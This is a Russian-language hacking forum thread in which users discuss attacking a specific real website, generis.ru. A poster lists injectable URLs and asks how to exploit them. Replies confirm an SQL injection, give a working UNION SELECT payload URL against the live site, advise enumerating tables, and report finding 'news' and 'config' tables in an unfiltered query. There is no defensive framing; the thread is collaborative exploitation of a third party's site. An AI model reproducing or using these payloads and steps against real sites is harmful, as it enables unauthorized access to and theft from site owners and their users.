Просмотр полной версии : php-inj & sql-inj на generis.ru
На этом сайте найдены
http://www.generis.ru/
потенциальная php-inj
http://www.generis.ru/?page=qwe
и потенциальная sql-inj
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
По моему там только SQL Injections а пхп иньекций там нет то просто ошибака стиля вроде....
SQL-inj красава =))
пхп-инъекции к сожалению там нет... если толкьо локальных html-страничек.. но это ничего не даст..
SQL-inj красава =))
а чем плоха разнообразие как никак чел хоть ' не пихает как все (и я тоже ' пихаю) :D
Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
нашёл таблицу news но толку дамаю мало буит от этой таблицы)))
Да, действительно, толку мало...
еще таблица config
но столбцы не подобрал
Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
Разве это что-то меняет? ;)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot